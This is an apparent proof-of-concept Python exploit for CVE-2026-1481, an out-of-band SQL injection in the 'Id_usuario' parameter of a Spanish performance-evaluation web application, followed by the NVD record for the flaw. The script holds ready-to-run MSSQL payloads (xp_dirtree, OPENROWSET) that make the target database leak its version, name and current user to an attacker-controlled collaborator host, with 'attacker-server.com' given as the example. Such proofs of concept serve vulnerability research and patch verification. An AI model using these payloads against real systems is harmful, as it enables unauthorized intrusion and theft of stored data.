CVE-2026-1481

import requests import sys import time # CVE-2026-1481 OOB SQL Injection PoC # Target: Gabinete Técnico EDD Application # Endpoint: /evaluacion_objetivos_anyo_sig_ver_auto.aspx # Parameter: Id_usuario def test_oob_sql_injection(target_url, collaborator_url): """ Test for OOB SQL injection vulnerability target_url: Base URL of the vulnerable application collaborator_url: DNS/HTTP collaborator server URL to receive OOB data """ # Vulnerable endpoint endpoint = "/evaluacion_objetivos_anyo_sig_ver_auto.aspx" # OOB SQL injection payload - extracts database version via DNS # Using xp_dirtree to trigger DNS lookup to attacker server payload = f"'; DECLARE @cmd VARCHAR(500); SET @cmd = '\\\\{collaborator_url}\\\\test'; EXEC master..xp_dirtree @cmd; --" # Alternative payload using OPENDATASOURCE for HTTP-based data extraction alt_payload = "'; SELECT * FROM OPENROWSET(BULK 'http://" alt_payload += f"{collaborator_url}/?data='+@@VERSION, '', '', 'TEXT'); --" print(f"[*] Testing CVE-2026-1481 OOB SQL Injection") print(f"[*] Target: {target_url}{endpoint}") print(f"[*] Collaborator: {collaborator_url}") # Send malicious request params = { 'Id_usuario': payload } try: print(f"[+] Sending payload...") response = requests.get(target_url + endpoint, params=params, timeout=30) print(f"[+] Request sent, check collaborator for DNS/HTTP callbacks") print(f"[*] HTTP Status: {response.status_code}") return True except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False def extract_data(target_url, collaborator_url): """ Extract database information using OOB SQL injection """ endpoint = "/evaluacion_objetivos_anyo_sig_ver_auto.aspx" # Extract current database name db_payload = f"'; DECLARE @v VARCHAR(7000); SET @v = (SELECT DB_NAME()); EXEC master..xp_dirtree '\\\\{collaborator_url}\\\\'+@v; --" # Extract current user user_payload = f"'; DECLARE @u VARCHAR(7000); SET @u = (SELECT CURRENT_USER); EXEC master..xp_dirtree '\\\\{collaborator_url}\\\\'+@u; --" print(f"[*] Extracting database information...") for payload_name, payload in [('Database', db_payload), ('User', user_payload)]: params = {'Id_usuario': payload} try: requests.get(target_url + endpoint, params=params, timeout=30) print(f"[+] {payload_name} extraction request sent") except: pass time.sleep(2) if __name__ == "__main__": if len(sys.argv) < 3: print(f"Usage: python {sys.argv[0]} <target_url> <collaborator_url>") print(f"Example: python {sys.argv[0]} http://vulnerable-server.com http://attacker-server.com") sys.exit(1) target = sys.argv[1].rstrip('/') collaborator = sys.argv[2].rstrip('/') test_oob_sql_injection(target, collaborator)

{"cve": {"id": "CVE-2026-1481", "sourceIdentifier": "[email protected]", "published": "2026-01-27T17:16:11.687", "lastModified": "2026-02-10T20:19:16.253", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An out-of-band SQL injection vulnerability (OOB SQLi) has been detected in the Performance Evaluation (EDD) application developed by Gabinete Técnico de Programación. Exploiting this vulnerability in the parameter 'Id_usuario' in '/evaluacion_objetivos_anyo_sig_ver_auto.aspx', could allow an attacker to extract sensitive information from the database through external channels, without the affected application returning the data directly, compromising the confidentiality of the stored information."}, {"lang": "es", "value": "Una vulnerabilidad de inyección SQL fuera de banda (OOB SQLi) ha sido detectada en la aplicación de Evaluación del Desempeño (EDD) desarrollada por Gabinete Técnico de Programación. La explotación de esta vulnerabilidad en el parámetro 'Id_usuario' en '/evaluacion_objetivos_anyo_sig_ver_auto.aspx' podría permitir a un atacante extraer información sensible de la base de datos a través de canales externos, sin que la aplicación afectada devuelva los datos directamente, comprometiendo la confidencialidad de la información almacenada."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:quatuor:evaluacion_de_desempeno:-:*:*:*:*:*:*:*", "matchCriteriaId": "66ECBB1A-4822-4186-9C8B-49740C8B52A4"}]}]}], "references": [{"url": "https://www.incibe.es/en/incibe-cert/notices/aviso/out-band-sql-injection-quatuor-performance-evaluation", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}